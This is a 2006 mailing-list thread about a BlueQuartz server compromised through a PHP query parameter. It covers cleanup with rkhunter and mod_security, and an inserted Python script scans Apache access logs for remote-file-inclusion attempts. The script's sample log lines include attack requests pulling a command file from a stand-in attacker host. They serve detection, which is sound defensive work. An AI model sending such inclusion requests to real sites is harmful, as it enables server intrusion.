Date:  Wed, 13 Sep 2006 09:52:16 +0100
From:  "Paul Wilson - Swift Internet" <paulw (at mark) swiftinter.net>
Subject:  [coba-e:06876] Re: /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <003d01c6d714$02371580$0e00a8c0 (at mark) office.swiftinter.net>
References:  <002101c6d5ca$3c3c6960$6400a8c0 (at mark) YOUR4105E587B6> <006b01c6d655$d5dbbdb0$0e00a8c0 (at mark) office.swiftinter.net> <45071DAF.1070201 (at mark) planetcentral.net>
X-Mail-Count: 06876

The php?xxxxx query parameter has been exploited to upload the original hack 
file

The mod_security rules include a large number of blocks against this - but 
new flaws are being found

What did the access_log say? There should be a line telling you what page 
was used to upload the hack

Regards

Paul
________________________

Paul Wilson
Microsoft Certified Systems Engineer
paulw (at mark) swiftinter.net
http://www.swiftinter.net
Tel: 01527 500940
Fax: 01527 500934
________________________
Swift Internet is a trading division of On-Line Marketing & sales Ltd.
The information contained in this message is confidential and is
intended for the addressee(s) only.  If you have received this message
in error or there are any problems please notify the originator
immediately.  The unauthorised use, disclosure, copying or alteration of
this message is strictly forbidden. The sender will not be liable for direct,
special, indirect or consequential damages arising from alteration of
the contents of this message by a third party or as a result of any
virus being passed on.
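The advice above is to look in access_log for the page used to pull in the hack file. The following is an added example, not code from this thread or from BlueQuartz: it parses Apache combined-format lines and flags requests to .php pages whose query values carry a remote URL, which is the assumed meaning of the "php?xxxxx" pattern; the sample log lines, addresses and hostnames are constructed placeholders.

```python
"""Scan an Apache access_log for requests to .php pages whose query
parameter values point at a remote URL (added example; assumes the
"php?xxxxx" pattern in the thread means a query value carrying a URL)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: IP, ident, user, [time], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def find_remote_includes(log_lines):
    """Return one dict per suspicious request: the .php page, the
    parameter name, the remote URL it carried, client IP and status."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith(".php") or not parts.query:
            continue
        # keep_blank_values so "?xxx=" style probes are still parsed
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "page": parts.path,
                    "param": name,
                    "url": value,
                    "status": int(m.group("status")),
                })
    return hits

# Constructed sample lines; hosts and addresses are placeholders, not real IoCs.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2006:21:50:01 +0100] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Sep/2006:21:50:07 +0100] "GET /admin/include.php?inc=http://attacker.invalid/cmd.txt HTTP/1.0" 200 811 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [12/Sep/2006:21:50:09 +0100] "GET /index.php?page=ftp://attacker.invalid/x HTTP/1.0" 403 289 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["page"]} {hit["param"]}={hit["url"]} -> {hit["status"]}')
```

A 200 on such a line is the request that fetched the file; a 403 is one that a mod_security rule bounced, which is the difference the thread is asking about.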
----- Original Message ----- 
From: "paul" <paul (at mark) planetcentral.net>
To: <coba-e (at mark) bluequartz.org>
Sent: Tuesday, September 12, 2006 9:50 PM
Subject: [coba-e:06869] Re: /TMP Directory


> Paul,
>
> Have removed offending files and checked with rkh - all clear.
>
> Would be interested to hear what the score is with this mod_security 
> rule???
>
> Thx
> Paul
>
> Paul Wilson - Swift Internet wrote:
>> To be honest we did not find any damage apart from the initial lockup - 
>> the script prevents the restart of apache, so you have to force the 
>> apache processes to stop (always untidy)
>>
>> This thing seems to be used to flood networks with IRC data
>>
>> We installed rkhunter after removing the script and then ran it to ensure 
>> we had no lkms - all clear.
>>
>> Apart from that, I created a new mod_security rule based on that attack - 
>> we have had others try to get in the same way, only to be bounced off.
>>
>> Regards
>>
>> Paul
>
>

